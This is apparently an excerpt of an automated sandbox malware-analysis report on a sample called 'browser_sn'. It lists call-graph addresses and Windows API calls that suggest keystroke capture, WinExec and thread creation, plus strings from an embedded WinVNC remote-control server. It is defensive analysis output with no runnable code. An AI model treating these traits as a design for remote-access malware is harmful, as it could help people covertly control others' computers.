22957->22964 22958->22959 22965 7ff6c2bd0e24 MapVirtualKeyA 22958->22965 22967 7ff6c2bd0e62 GetAsyncKeyState 22959->22967 22968 7ff6c2bd0eb3 22959->22968 23115 7ff6c2b974c0 18 API calls 22960->23115 23109 7ff6c2b974c0 18 API calls 22962->23109 22963 7ff6c2bd1108 22973 7ff6c2bd115f GetAsyncKeyState 22963->22973 22989 7ff6c2bd111e 22963->22989 22970 7ff6c2bd0d37 22964->22970 22971 7ff6c2bd0a58 22964->22971 23110 7ff6c2b974c0 18 API calls 22965->23110 22975 7ff6c2bd0e76 MapVirtualKeyA 22967->22975 22967->23039 22978 7ff6c2bd0ec6 GetAsyncKeyState 22968->22978 22979 7ff6c2bd0f17 GetAsyncKeyState 22968->22979 22968->23039 22980 7ff6c2b83730 _RunAllParam 89 API calls 22970->22980 22981 7ff6c2bd0ad4 GetAsyncKeyState 22971->22981 22982 7ff6c2bd0b27 GetAsyncKeyState 22971->22982 22984 7ff6c2bd1174 GetAsyncKeyState 22973->22984 22973->22989 22974 7ff6c2bd1001 23116 7ff6c2bd02a0 109 API calls _RunAllParam 22974->23116 23111 7ff6c2b974c0 18 API calls 22975->23111 22976 7ff6c2bd0def 22987 7ff6c2b83730 _RunAllParam 89 API calls 22976->22987 22977 7ff6c2bd124d MapVirtualKeyA 23123 7ff6c2b974c0 18 API calls 22977->23123 22991 7ff6c2bd0eda MapVirtualKeyA 22978->22991 22978->23039 22995 7ff6c2bd0f62 GetAsyncKeyState 22979->22995 22996 7ff6c2bd0f27 MapVirtualKeyA 22979->22996 22980->22946 22992 7ff6c2bd0aec MapVirtualKeyA 22981->22992 23036 7ff6c2bd0b1e 22981->23036 22998 7ff6c2bd0b3c MapVirtualKeyA 22982->22998 22999 7ff6c2bd0b77 GetAsyncKeyState 22982->22999 22983 7ff6c2bd0e3b 22993 7ff6c2b83730 _RunAllParam 89 API calls 22983->22993 22984->22989 22994 7ff6c2bd1184 22984->22994 22987->22954 22989->22977 22990 7ff6c2bd1151 22989->22990 22990->22977 23112 7ff6c2b974c0 18 API calls 22991->23112 23093 7ff6c2b974c0 18 API calls 22992->23093 22993->22959 22994->22989 23014 7ff6c2b83730 _RunAllParam 89 API calls 22994->23014 23006 7ff6c2bd0f72 MapVirtualKeyA 22995->23006 22995->23039 23113 7ff6c2b974c0 18 API calls 22996->23113 22997 7ff6c2bd100a 23117 7ff6c2bd02a0 109 API calls _RunAllParam 22997->23117 23094 7ff6c2b974c0 18 API calls 22998->23094 23002 7ff6c2bd0b87 MapVirtualKeyA 22999->23002 22999->23036 23000 7ff6c2bd0e8d 23010 7ff6c2b83730 _RunAllParam 89 API calls 23000->23010 23001 7ff6c2bd1267 23001->23001 23095 7ff6c2b974c0 18 API calls 23002->23095 23004 7ff6c2b83730 _RunAllParam 89 API calls 23013 7ff6c2bd0bf1 MapVirtualKeyA 23004->23013 23114 7ff6c2b974c0 18 API calls 23006->23114 23010->23039 23012 7ff6c2bd0ef1 23021 7ff6c2b83730 _RunAllParam 89 API calls 23012->23021 23096 7ff6c2b974c0 18 API calls 23013->23096 23023 7ff6c2bd11a5 23014->23023 23015 7ff6c2bd0f40 23024 7ff6c2b83730 _RunAllParam 89 API calls 23015->23024 23017 7ff6c2bd0b03 23026 7ff6c2b83730 _RunAllParam 89 API calls 23017->23026 23018 7ff6c2bd1013 23118 7ff6c2bd02a0 109 API calls _RunAllParam 23018->23118 23019 7ff6c2bd0b55 23028 7ff6c2b83730 _RunAllParam 89 API calls 23019->23028 23020 7ff6c2bd0ba0 23030 7ff6c2b83730 _RunAllParam 89 API calls 23020->23030 23021->23039 23032 7ff6c2bd11ba 23023->23032 23033 7ff6c2bd1206 23023->23033 23034 7ff6c2bd0f5e 23024->23034 23025 7ff6c2bd0f8b 23035 7ff6c2b83730 _RunAllParam 89 API calls 23025->23035 23026->23036 23029 7ff6c2bd0b73 23028->23029 23029->22999 23030->23036 23031 7ff6c2bd0c08 MapVirtualKeyA 23097 7ff6c2b974c0 18 API calls 23031->23097 23042 7ff6c2b83730 _RunAllParam 89 API calls 23032->23042 23053 7ff6c2bd11fd 23032->23053 23043 7ff6c2b83730 _RunAllParam 89 API calls 23033->23043 23033->23053 23034->22995 23035->23039 23036->23004 23037 7ff6c2bd101c 23119 7ff6c2bd02a0 109 API calls _RunAllParam 23037->23119 23039->22952 23041 7ff6c2bd0c1f MapVirtualKeyA 23098 7ff6c2b974c0 18 API calls 23041->23098 23046 7ff6c2bd11ce CreateThread CloseHandle 23042->23046 23047 7ff6c2bd121a 23043->23047 23044 7ff6c2bd1025 23044->22934 23046->23053 23122 7ff6c2bea910 116 API calls _RunAllParam 23047->23122 23048 7ff6c2b83730 _RunAllParam 89 API calls 23051 7ff6c2bd1230 WinExec 23048->23051 23049 7ff6c2bd0c36 MapVirtualKeyA 23099 7ff6c2b974c0 18 API calls 23049->23099 23051->22990 23053->23048 23054 7ff6c2bd0c53 MapVirtualKeyA 23100 7ff6c2b974c0 18 API calls 23054->23100 23056 7ff6c2bd0c6c MapVirtualKeyA 23101 7ff6c2b974c0 18 API calls 23056->23101 23058 7ff6c2bd0c89 MapVirtualKeyA 23102 7ff6c2b974c0 18 API calls 23058->23102 23060 7ff6c2bd0ca2 MapVirtualKeyA 23103 7ff6c2b974c0 18 API calls 23060->23103 23062 7ff6c2bd0cbf MapVirtualKeyA 23104 7ff6c2b974c0 18 API calls 23062->23104 23064 7ff6c2bd0cd8 MapVirtualKeyA 23105 7ff6c2b974c0 18 API calls 23064->23105 23066 7ff6c2bd0cef 23106 7ff6c2bd02a0 109 API calls _RunAllParam 23066->23106 23068 7ff6c2bd0cf8 23107 7ff6c2bd02a0 109 API calls _RunAllParam 23068->23107 23070 7ff6c2bd0d01 23108 7ff6c2bd02a0 109 API calls _RunAllParam 23070->23108 23072->22925 23073->22925 23075->22925 23076->22867 23077->22925 23078->22925 23079->22925 23080->22925 23081->22882 23083->22906 23085->22920 23087 7ff6c2bd163b 23086->23087 23089 7ff6c2bd1665 23087->23089 23124 7ff6c2bd2f30 23087->23124 23089->22963 23092 7ff6c2bd169c 23092->22963 23093->23017 23094->23019 23095->23020 23096->23031 23097->23041 23098->23049 23099->23054 23100->23056 23101->23058 23102->23060 23103->23062 23104->23064 23105->23066 23106->23068 23107->23070 23108->22946 23109->22976 23110->22983 23111->23000 23112->23012 23113->23015 23114->23025 23115->22974 23116->22997 23117->23018 23118->23037 23119->23044 23120->22953 23121->22948 23122->23053 23123->23001 23128 7ff6c2bd2ff0 23124->23128 23126 7ff6c2bd1689 23127 7ff6c2bd2550 71 API calls 23126->23127 23127->23092 23129 7ff6c2c37978 81 API calls 23128->23129 23130 7ff6c2bd3003 23129->23130 23131 7ff6c2bd3008 23130->23131 23156 7ff6c2c3749c 70 API calls std::exception::exception 23130->23156 23131->23126 23133 7ff6c2bd3043 23134 7ff6c2c42950 RaiseException 23133->23134 23135 7ff6c2bd3060 GetWindowLongPtrA 23134->23135 23136 7ff6c2bd3140 23135->23136 23137 7ff6c2bd30b9 23135->23137 23138 7ff6c2bd3265 EndDialog 23136->23138 23139 7ff6c2bd31ae SetWindowLongPtrA GetDlgItem 23137->23139 23143 7ff6c2bd30c5 23137->23143 23140 7ff6c2bd31a7 23138->23140 23141 7ff6c2bd31de SendMessageA GetDlgItem 23139->23141 23142 7ff6c2c37220 _getdrive 8 API calls 23140->23142 23146 7ff6c2bd320f SetForegroundWindow 23141->23146 23147 7ff6c2bd328a 23142->23147 23143->23136 23143->23140 23144 7ff6c2bd30e4 23143->23144 23145 7ff6c2bd314a GetDlgItem SendMessageA 23143->23145 23144->23140 23148 7ff6c2bd30ef GetDlgItem SendMessageA 23144->23148 23149 7ff6c2bd3174 SendMessageA 23145->23149 23150 7ff6c2bd318f 23145->23150 23152 7ff6c2bd322e 23146->23152 23147->23126 23148->23136 23151 7ff6c2bd3117 SendMessageA 23148->23151 23149->23150 23150->23138 23151->23136 23153 7ff6c2bd3132 23151->23153 23154 7ff6c2bd323a GetDlgItem EnableWindow 23152->23154 23155 7ff6c2bd324d GetDlgItem EnableWindow 23152->23155 23153->23136 23154->23140 23155->23140 23156->23133 23157 7ff6c2ba80da 23176 7ff6c2b90270 23157->23176 23159 7ff6c2ba81c6 23160 7ff6c2c392a4 __wtomb_environ 70 API calls 23159->23160 23161 7ff6c2ba81e7 CreateRectRgn 23160->23161 23183 7ff6c2b821e0 23161->23183 23163 7ff6c2ba8211 LoadLibraryA 23164 7ff6c2ba825e 23163->23164 23165 7ff6c2ba8247 GetProcAddress 23163->23165 23166 7ff6c2b83730 _RunAllParam 89 API calls 23164->23166 23165->23164 23167 7ff6c2ba828f 23166->23167 23168 7ff6c2b83730 _RunAllParam 89 API calls 23167->23168 23169 7ff6c2ba82f7 23168->23169 23170 7ff6c2c37978 81 API calls 23169->23170 23171 7ff6c2ba831e 23170->23171 23172 7ff6c2c37978 81 API calls 23171->23172 23173 7ff6c2ba8454 23172->23173 23174 7ff6c2ba8469 23173->23174 23185 7ff6c2b93fb0 23173->23185 23177 7ff6c2c392a4 __wtomb_environ 70 API calls 23176->23177 23178 7ff6c2b9028f CreateRectRgn 23177->23178 23179 7ff6c2c392a4 __wtomb_environ 70 API calls 23178->23179 23180 7ff6c2b902b3 CreateRectRgn 23179->23180 23181 7ff6c2c392a4 __wtomb_environ 70 API calls 23180->23181 23182 7ff6c2b902d7 CreateRectRgn 23181->23182 23182->23159 23184 7ff6c2b82259 23183->23184 23184->23163 23186 7ff6c2b93fe1 _recalloc 23185->23186 23187 7ff6c2b9408b GetComputerNameA 23186->23187 23188 7ff6c2b940d0 LoadLibraryA 23187->23188 23189 7ff6c2b940a6 23187->23189 23190 7ff6c2b940e6 23188->23190 23191 7ff6c2b940fd 23188->23191 23189->23188 23193 7ff6c2b8a040 8 API calls 23190->23193 23191->23174 23193->23191 23361 7ff6c2b856e0 DeleteCriticalSection DeleteCriticalSection FreeLibrary DeleteFileA 23362 7ff6c2ba90f0 EnterCriticalSection LeaveCriticalSection 23363 7ff6c2bad0f0 DialogBoxParamA 23364 7ff6c2baf6f0 10 API calls _getdrive 23366 7ff6c2b9a6f0 GetWindowLongPtrA SetWindowLongPtrA SetDlgItemTextA SetForegroundWindow EndDialog 23368 7ff6c2ba9480 117 API calls _RunAllParam 23369 7ff6c2b92880 196 API calls 23370 7ff6c2b8d880 6 API calls _RunAllParam 23371 7ff6c2baa085 98 API calls 23372 7ff6c2be5e80 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection 23377 7ff6c2b9a890 97 API calls 2 library calls 22037 7ff6c2ba88a0 getpeername inet_ntoa 22049 7ff6c2c392a4 22037->22049 22042 7ff6c2ba893d InitializeCriticalSection 22075 7ff6c2c179a0 EnterCriticalSection LeaveCriticalSection CreateSemaphoreA GetLastError RaiseException 22042->22075 22044 7ff6c2ba895e 22045 7ff6c2ba8988 22044->22045 22071 7ff6c2b9f840 22044->22071 22076 7ff6c2c37220 22045->22076 22047 7ff6c2ba89c3 22050 7ff6c2c392bb _tzset 22049->22050 22051 7ff6c2ba8913 22049->22051 22087 7ff6c2c38c34 22050->22087 22059 7ff6c2c37978 22051->22059 22055 7ff6c2c392e3 22055->22051 22056 7ff6c2c392ec 22055->22056 22105 7ff6c2c44930 16 API calls _tzset 22056->22105 22063 7ff6c2c37983 22059->22063 22060 7ff6c2c38c34 malloc 70 API calls 22060->22063 22061 7ff6c2ba8930 22061->22042 22061->22044 22062 7ff6c2c43238 _callnewh DecodePointer 22062->22063 22063->22060 22063->22061 22063->22062 22066 7ff6c2c379a2 22063->22066 22064 7ff6c2c379f3 22163 7ff6c2c3755c 70 API calls std::exception::operator= 22064->22163 22066->22064 22162 7ff6c2c37b94 80 API calls 22066->22162 22067 7ff6c2c37a04 22164 7ff6c2c42950 22067->22164 22070 7ff6c2c37a1a 22072 7ff6c2b9f885 22071->22072 22167 7ff6c2c17b50 EnterCriticalSection 22072->22167 22074 7ff6c2b9f926 22074->22045 22075->22044 22077 7ff6c2c37229 22076->22077 22078 7ff6c2c37234 22077->22078 22079 7ff6c2c429e4 RtlCaptureContext RtlLookupFunctionEntry 22077->22079 22078->22047 22080 7ff6c2c42a69 22079->22080 22081 7ff6c2c42a28 RtlVirtualUnwind 22079->22081 22082 7ff6c2c42a8b IsDebuggerPresent 22080->22082 22081->22082 22223 7ff6c2c4dc94 22082->22223 22084 7ff6c2c42aea SetUnhandledExceptionFilter UnhandledExceptionFilter 22085 7ff6c2c42b08 _getdrive 22084->22085 22086 7ff6c2c42b12 GetCurrentProcess TerminateProcess 22084->22086 22085->22086 22086->22047 22088 7ff6c2c38cc8 22087->22088 22089 7ff6c2c38c4c 22087->22089 22090 7ff6c2c43238 _callnewh DecodePointer 22088->22090 22091 7ff6c2c38c84 HeapAlloc 22089->22091 22092 7ff6c2c38c64 22089->22092 22097 7ff6c2c38cad 22089->22097 22101 7ff6c2c38cb2 22089->22101 22109 7ff6c2c43238 DecodePointer 22089->22109 22093 7ff6c2c38ccd 22090->22093 22091->22089 22096 7ff6c2c38cbd 22091->22096 22092->22091 22106 7ff6c2c42ed0 70 API calls 2 library calls 22092->22106 22107 7ff6c2c42c70 70 API calls 4 library calls 22092->22107 22108 7ff6c2c3abd8 GetModuleHandleW GetProcAddress ExitProcess malloc 22092->22108 22095 7ff6c2c3ffc8 _errno 69 API calls 22093->22095 22095->22096 22096->22051 22104 7ff6c2c37de8 70 API calls 2 library calls 22096->22104 22111 7ff6c2c3ffc8 22097->22111 22103 7ff6c2c3ffc8 _errno 69 API calls 22101->22103 22103->22096 22104->22055 22106->22092 22107->22092 22110 7ff6c2c43253 22109->22110 22110->22089 22114 7ff6c2c437c4 GetLastError FlsGetValue 22111->22114 22113 7ff6c2c3ffd1 22113->22101 22115 7ff6c2c437ea 22114->22115 22116 7ff6c2c43832 SetLastError 22114->22116 22126 7ff6c2c432ec 22115->22126 22116->22113 22119 7ff6c2c437ff FlsSetValue 22120 7ff6c2c4382b 22119->22120 22121 7ff6c2c43815 22119->22121 22140 7ff6c2c38bf4 22120->22140 22131 7ff6c2c4370c 22121->22131 22125 7ff6c2c43830 22125->22116 22127 7ff6c2c43311 22126->22127 22129 7ff6c2c43351 22127->22129 22130 7ff6c2c4332f Sleep 22127->22130 22146 7ff6c2c49234 22127->22146 22129->22116 22129->22119 22130->22127 22130->22129 22154 7ff6c2c477d0 22131->22154 22133 7ff6c2c43765 22134 7ff6c2c476d0 _isindst LeaveCriticalSection 22133->22134 22135 7ff6c2c4377a 22134->22135 22136 7ff6c2c477d0 _lock 70 API calls 22135->22136 22137 7ff6c2c43784 ___lc_codepage_func 22136->22137 22138 7ff6c2c476d0 _isindst LeaveCriticalSection 22137->22138 22139 7ff6c2c437b6 GetCurrentThreadId 22138->22139 22139->22116 22141 7ff6c2c38bf9 RtlFreeHeap 22140->22141 22145 7ff6c2c38c29 free 22140->22145 22142 7ff6c2c38c14 22141->22142 22141->22145 22143 7ff6c2c3ffc8 _errno 68 API calls 22142->22143 22144 7ff6c2c38c19 GetLastError 22143->22144 22144->22145 22145->22125 22147 7ff6c2c49249 22146->22147 22152 7ff6c2c49266 22146->22152 22148 7ff6c2c49257 22147->22148 22147->22152 22149 7ff6c2c3ffc8 _errno 69 API calls 22148->22149 22151 7ff6c2c4925c 22149->22151 22150 7ff6c2c4927e HeapAlloc 22150->22151 22150->22152 22151->22127 22152->22150 22152->22151 22153 7ff6c2c43238 _callnewh DecodePointer 22152->22153 22153->22152 22155 7ff6c2c477ff EnterCriticalSection 22154->22155 22156 7ff6c2c477ee 22154->22156 22160 7ff6c2c476e8 70 API calls 7 library calls 22156->22160 22158 7ff6c2c477f3 22158->22155 22161 7ff6c2c3af34 70 API calls 5 library calls 22158->22161 22160->22158 22161->22155 22162->22064 22163->22067 22165 7ff6c2c4297e 22164->22165 22166 7ff6c2c429bd RaiseException 22165->22166 22166->22070 22168 7ff6c2c17b6d 22167->22168 22169 7ff6c2c17b84 22167->22169 22170 7ff6c2c42950 RaiseException 22168->22170 22187 7ff6c2c4285c 22169->22187 22170->22169 22173 7ff6c2c17bc9 GetLastError 22175 7ff6c2c42950 RaiseException 22173->22175 22174 7ff6c2c17c0b 22176 7ff6c2c17c18 SetThreadPriority 22174->22176 22177 7ff6c2c17be4 22175->22177 22178 7ff6c2c17c27 GetLastError 22176->22178 22179 7ff6c2c17c43 ResumeThread 22176->22179 22177->22174 22177->22176 22180 7ff6c2c42950 RaiseException 22177->22180 22181 7ff6c2c42950 RaiseException 22178->22181 22182 7ff6c2c17c6e LeaveCriticalSection 22179->22182 22183 7ff6c2c17c52 GetLastError 22179->22183 22180->22174 22184 7ff6c2c17c42 22181->22184 22182->22074 22185 7ff6c2c42950 RaiseException 22183->22185 22184->22179 22186 7ff6c2c17c6d 22185->22186 22186->22182 22188 7ff6c2c42887 22187->22188 22189 7ff6c2c4289c 22187->22189 22190 7ff6c2c3ffc8 _errno 70 API calls 22188->22190 22192 7ff6c2c432ec _getdrive 70 API calls 22189->22192 22191 7ff6c2c4288c 22190->22191 22210 7ff6c2c449d4 22191->22210 22194 7ff6c2c428b0 22192->22194 22195 7ff6c2c42920 22194->22195 22205 7ff6c2c43848 22194->22205 22198 7ff6c2c38bf4 free 70 API calls 22195->22198 22196 7ff6c2c17bb9 22196->22173 22196->22177 22200 7ff6c2c42928 22198->22200 22200->22196 22213 7ff6c2c40008 70 API calls 2 library calls 22200->22213 22201 7ff6c2c4370c _getptd 70 API calls 22202 7ff6c2c428cc CreateThread 22201->22202 22202->22196 22204 7ff6c2c42918 GetLastError 22202->22204 22204->22195 22206 7ff6c2c437c4 _getptd 70 API calls 22205->22206 22207 7ff6c2c43853 22206->22207 22208 7ff6c2c428bd 22207->22208 22214 7ff6c2c3af34 70 API calls 5 library calls 22207->22214 22208->22201 22215 7ff6c2c44964 DecodePointer 22210->22215 22213->22196 22214->22208 22216 7ff6c2c449c3 22215->22216 22217 7ff6c2c449a2 22215->22217 22222 7ff6c2c44930 16 API calls _tzset 22216->22222 22217->22196 22223->22084 23379 7ff6c2bb5ca0 331 API calls 4 library calls 23380 7ff6c2bb54a0 109 API calls 4 library calls 23384 7ff6c2b9cca0 115 API calls 23386 7ff6c2c03ca0 75 API calls 3 library calls 23388 7ff6c2b934b0 13 API calls _getdrive 23389 7ff6c2b93cb0 RegCreateKeyExA RegOpenKeyExA RegDeleteValueA RegCloseKey RegCloseKey 23391 7ff6c2b8a6b0 93 API calls 2 library calls 23397 7ff6c2bb1440 126 API calls _RunAllParam 23398 7ff6c2bb5040 SetRectRgn CombineRgn DeleteObject 23399 7ff6c2ba4003 277 API calls 3 library calls 23400 7ff6c2ba4003 249 API calls 2 library calls 23403 7ff6c2b92a50 SetServiceStatus 23405 7ff6c2b81450 RaiseException 23406 7ff6c2bb3460 122 API calls 2 library calls 23408 7ff6c2bb5a60 8 API calls 23409 7ff6c2ba9060 129 API calls 23412 7ff6c2b85a60 25 API calls 2 library calls 23413 7ff6c2b86060 112 API calls 2 library calls 23414 7ff6c2b83e60 34 API calls 23416 7ff6c2b92a6e SetServiceStatus SetEvent SetEvent 23417 7ff6c2ba8a70 133 API calls 4 library calls 23423 7ff6c2b81a70 CloseClipboard

                                                                            Executed Functions

                                                                            Function 00007FF6C2BA36D0 Relevance: 98.9, APIs: 31, Strings: 25, Instructions: 895librarythreadsleepCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Desktop$Thread$CloseCriticalSection$CurrentEnterFilefree$BuffersErrorFlushHandleInputLeaveLibraryNameObjectOpenSleep$AddressComputerCountCreateDeleteFreeInformationLastLoadModeModulePriorityProcRectTickTimeUser_snprintfgethostnametime
                                                                            • String ID: ( $ - $Could not connect to %s!$Could not connect using %s!$Host name unavailable$LOGEXIT$WinVNC$\logging.dll$application mode$service mode$vncclient.cpp : PostAddNewClient I$vncclient.cpp : PostAddNewClient II$vncclient.cpp : authenticated connection$vncclient.cpp : client connected : %s (%hd)$vncclient.cpp : client disconnected : %s (%hd)$vncclient.cpp : failed to close desktop$vncclient.cpp : negotiated version$vncclient.cpp : sent pixel format to client$vncclient.cpp : vncClientThread $vncservice.cpp : OpenInputdesktop2 $vncservice.cpp : OpenInputdesktop2 NULL$vncservice.cpp : OpenInputdesktop2 OK$vncservice.cpp : PostAddNewClient failed$vncservice.cpp : SelectDesktop $vncservice.cpp : SelectDesktop failed to close desktop
                                                                            • API String ID: 459429253-3399855497
                                                                            • Opcode ID: c708106eea21312b0ff10812b2299c3caf0780bd7169fe3a5c2cd561237a6d82
                                                                            • Instruction ID: 98c0157438aa20f2d2eeb4cac4a299ddb6944fe9c048568ad77d295eb043727a
                                                                            • Opcode Fuzzy Hash: c708106eea21312b0ff10812b2299c3caf0780bd7169fe3a5c2cd561237a6d82
                                                                            • Instruction Fuzzy Hash: 09A28D26608A8185EB90DF25C858BFE37B1FB85B9AF454232CE9D877A5DFB8D445C300
                                                                            Function 00007FF6C2BE9BC0 Relevance: 31.6, APIs: 14, Strings: 4, Instructions: 105libraryloaderprocessCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: AddressLibraryProcProcess$CloseCreateCurrentFirstFreeHandleLoadMetricsProcess32SessionSnapshotSystemToolhelp32
                                                                            • String ID: ProcessIdToSessionId$WTSGetActiveConsoleSessionId$explorer.exe$kernel32.dll
                                                                            • API String ID: 1881659197-3751679782
                                                                            • Opcode ID: 2dbd4ffebc6746016a1012bd7f42155df4cc965da3ae6bbb03cb4ee60b751db4
                                                                            • Instruction ID: 988396a2c82cabdc96e26aef1a9f5134162db6eb3982b3bbb0d101ca312f8db1
                                                                            • Opcode Fuzzy Hash: 2dbd4ffebc6746016a1012bd7f42155df4cc965da3ae6bbb03cb4ee60b751db4
                                                                            • Instruction Fuzzy Hash: C1411C31A08E42C6EBA0DF11A8041A973A0FF49B9AF444575DEDE83BA4DFBCE449C740
                                                                            Function 00007FF6C2BE9EF0 Relevance: 26.4, APIs: 8, Strings: 7, Instructions: 113COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            APIs
                                                                            Strings
                                                                            • vncservice.cpp : @@@@@@@@@@@@@ GetCurrentUser - Error: No user logged on , xrefs: 00007FF6C2BEA01F
                                                                            • vncservice.cpp : @@@@@@@@@@@@@ GetCurrentUser - Error: NOT impersonating user , xrefs: 00007FF6C2BE9FB7
                                                                            • vncservice.cpp : @@@@@@@@@@@@@ GetCurrentUser - Error: Unknown OS , xrefs: 00007FF6C2BEA094
                                                                            • vncservice.cpp : @@@@@@@@@@@@@ GetCurrentUser - Error: Usersize 0, xrefs: 00007FF6C2BE9F7F
                                                                            • vncservice.cpp : @@@@@@@@@@@@@ GetCurrentUser - ERROR : No window station , xrefs: 00007FF6C2BE9F3B
                                                                            • vncservice.cpp : @@@@@@@@@@@@@ GetCurrentUser - UserNAme found: %s , xrefs: 00007FF6C2BEA06F
                                                                            • vncservice.cpp : getusername error %d, xrefs: 00007FF6C2BEA04A
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: ErrorLast$User$InformationNameObjectProcessRevertSelfStationWindow
                                                                            • String ID: vncservice.cpp : @@@@@@@@@@@@@ GetCurrentUser - ERROR : No window station $vncservice.cpp : @@@@@@@@@@@@@ GetCurrentUser - Error: NOT impersonating user $vncservice.cpp : @@@@@@@@@@@@@ GetCurrentUser - Error: No user logged on $vncservice.cpp : @@@@@@@@@@@@@ GetCurrentUser - Error: Unknown OS $vncservice.cpp : @@@@@@@@@@@@@ GetCurrentUser - Error: Usersize 0$vncservice.cpp : @@@@@@@@@@@@@ GetCurrentUser - UserNAme found: %s $vncservice.cpp : getusername error %d
                                                                            • API String ID: 3635673080-2232443292
                                                                            • Opcode ID: df8b4108ed97db498e513780486a315d6e916c093cc0dcc6e4f94b4d88527eb8
                                                                            • Instruction ID: 97652be3163646d7fd90ebe13b025095ab9cc54f862069256f5dd3ad90099760
                                                                            • Opcode Fuzzy Hash: df8b4108ed97db498e513780486a315d6e916c093cc0dcc6e4f94b4d88527eb8
                                                                            • Instruction Fuzzy Hash: 16414D25E0C98382EB80DF69F8402B963B1BF9674EF944471DE8DC2765DEBDE4498780
                                                                            Function 00007FF6C2B89D00 Relevance: 15.2, APIs: 10, Instructions: 209serviceCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
